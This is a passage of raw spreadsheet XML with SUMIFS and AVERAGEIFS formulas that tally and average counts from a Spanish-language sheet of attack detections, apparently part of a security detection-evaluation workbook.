        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>10</v>
      </c>
      <c r="BR43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>1</v>
      </c>
      <c r="BX43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>1</v>
      </c>
      <c r="CJ43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>3</v>
      </c>
      <c r="CP43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>2</v>
      </c>
      <c r="CQ43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>6</v>
      </c>
      <c r="CU43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>1</v>
      </c>
      <c r="CZ43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>1</v>
      </c>
      <c r="DF43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ43" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK43" s="271"/>
      <c r="DO43" s="357"/>
      <c r="DP43" s="435" t="s">
        <v>2494</v>
      </c>
      <c r="DQ43" s="436">
        <f t="shared" ref="DQ43:DU43" si="28">SUM(DQ28:DQ41)</f>
        <v>6</v>
      </c>
      <c r="DR43" s="436">
        <f t="shared" si="28"/>
        <v>20</v>
      </c>
      <c r="DS43" s="436">
        <f t="shared" si="28"/>
        <v>30</v>
      </c>
      <c r="DT43" s="436">
        <f t="shared" si="28"/>
        <v>32</v>
      </c>
      <c r="DU43" s="359">
        <f t="shared" si="28"/>
        <v>46</v>
      </c>
      <c r="DV43" s="271"/>
      <c r="DW43" s="435" t="s">
        <v>2495</v>
      </c>
      <c r="DX43" s="324">
        <f t="shared" ref="DX43:EB43" si="29">SUM(DX28:DX41)</f>
        <v>8</v>
      </c>
      <c r="DY43" s="324">
        <f t="shared" si="29"/>
        <v>24</v>
      </c>
      <c r="DZ43" s="324">
        <f t="shared" si="29"/>
        <v>38</v>
      </c>
      <c r="EA43" s="324">
        <f t="shared" si="29"/>
        <v>41</v>
      </c>
      <c r="EB43" s="359">
        <f t="shared" si="29"/>
        <v>74</v>
      </c>
      <c r="EC43" s="271"/>
      <c r="ED43" s="280"/>
      <c r="EG43" s="279"/>
      <c r="EH43" s="271"/>
      <c r="EI43" s="435" t="s">
        <v>2496</v>
      </c>
      <c r="EJ43" s="437">
        <f t="shared" ref="EJ43:EN43" si="30">SUM(EJ28:EJ41)</f>
        <v>46</v>
      </c>
      <c r="EK43" s="437">
        <f t="shared" si="30"/>
        <v>184</v>
      </c>
      <c r="EL43" s="437">
        <f t="shared" si="30"/>
        <v>296</v>
      </c>
      <c r="EM43" s="437">
        <f t="shared" si="30"/>
        <v>655</v>
      </c>
      <c r="EN43" s="437">
        <f t="shared" si="30"/>
        <v>655</v>
      </c>
      <c r="EO43" s="438"/>
      <c r="EP43" s="438"/>
      <c r="EQ43" s="438"/>
      <c r="ER43" s="271"/>
      <c r="ES43" s="271"/>
      <c r="ET43" s="271"/>
      <c r="EU43" s="271"/>
      <c r="EV43" s="271"/>
      <c r="EW43" s="432"/>
      <c r="EX43" s="432"/>
      <c r="EY43" s="432"/>
      <c r="EZ43" s="432"/>
      <c r="FA43" s="367"/>
      <c r="FC43" s="382" t="s">
        <v>2465</v>
      </c>
      <c r="FD43" s="383"/>
      <c r="FE43" s="384">
        <f t="shared" ref="FE43:FH43" si="31">SQRT(FE41*(1-FE42))</f>
        <v>0.07726443094</v>
      </c>
      <c r="FF43" s="384">
        <f t="shared" si="31"/>
        <v>0.2460301701</v>
      </c>
      <c r="FG43" s="384">
        <f t="shared" si="31"/>
        <v>0.3244227662</v>
      </c>
      <c r="FH43" s="384">
        <f t="shared" si="31"/>
        <v>0.2610618513</v>
      </c>
      <c r="FM43" s="392"/>
      <c r="FN43" s="392"/>
      <c r="FO43" s="392"/>
      <c r="FP43" s="392"/>
      <c r="FQ43" s="392"/>
      <c r="FR43" s="392"/>
      <c r="FS43" s="392"/>
      <c r="FT43" s="392"/>
      <c r="FU43" s="392"/>
      <c r="FV43" s="392"/>
      <c r="FW43" s="392"/>
      <c r="FX43" s="392"/>
      <c r="FY43" s="392"/>
      <c r="FZ43" s="392"/>
      <c r="GA43" s="392"/>
      <c r="GB43" s="392"/>
      <c r="GC43" s="392"/>
      <c r="GD43" s="392"/>
      <c r="GE43" s="392"/>
      <c r="GF43" s="392"/>
      <c r="GG43" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SVCCTL")</f>
        <v>SVCCTL</v>
      </c>
      <c r="GH43" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>1</v>
      </c>
      <c r="GI43" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>1</v>
      </c>
      <c r="GJ43" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>1</v>
      </c>
      <c r="GK43" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SVCCTL")</f>
        <v>SVCCTL</v>
      </c>
      <c r="GL43" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>1</v>
      </c>
      <c r="GM43" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>1</v>
      </c>
      <c r="GN43" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>1</v>
      </c>
      <c r="GO43" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SVCCTL")</f>
        <v>SVCCTL</v>
      </c>
      <c r="GP43" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>1</v>
      </c>
      <c r="GQ43" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>1</v>
      </c>
      <c r="GR43" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>1</v>
      </c>
      <c r="GS43" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SVCCTL")</f>
        <v>SVCCTL</v>
      </c>
      <c r="GT43" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>0</v>
      </c>
      <c r="GU43" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>0</v>
      </c>
      <c r="GV43" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG43)</f>
        <v>0</v>
      </c>
      <c r="GW43" s="392"/>
      <c r="GX43" s="392"/>
      <c r="GY43" s="392"/>
      <c r="GZ43" s="392"/>
      <c r="HA43" s="392"/>
      <c r="HB43" s="392"/>
      <c r="HC43" s="392"/>
      <c r="HD43" s="392"/>
      <c r="HE43" s="392"/>
      <c r="HF43" s="392"/>
      <c r="HG43" s="392"/>
      <c r="HH43" s="392"/>
      <c r="HI43" s="392"/>
      <c r="HJ43" s="392"/>
      <c r="HK43" s="392"/>
      <c r="HL43" s="392"/>
      <c r="HM43" s="392"/>
      <c r="HN43" s="392"/>
      <c r="HO43" s="392"/>
      <c r="HP43" s="392"/>
    </row>
    <row r="44">
      <c r="B44" s="277"/>
      <c r="C44" s="271"/>
      <c r="D44" s="271"/>
      <c r="E44" s="271"/>
      <c r="F44" s="271"/>
      <c r="G44" s="278"/>
      <c r="J44" s="277"/>
      <c r="K44" s="434"/>
      <c r="L44" s="353"/>
      <c r="M44" s="353"/>
      <c r="N44" s="354"/>
      <c r="O44" s="278"/>
      <c r="Q44" s="271"/>
      <c r="R44" s="386" t="s">
        <v>2489</v>
      </c>
      <c r="S44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="T44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="V44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="W44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Z44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>1356</v>
      </c>
      <c r="AA44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="AB44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="AC44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>18</v>
      </c>
      <c r="AD44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="AE44" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AF44" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>18</v>
      </c>
      <c r="AG44" s="271"/>
      <c r="AH44" s="386" t="s">
        <v>2489</v>
      </c>
      <c r="AI44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>4</v>
      </c>
      <c r="AJ44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ44" s="355">
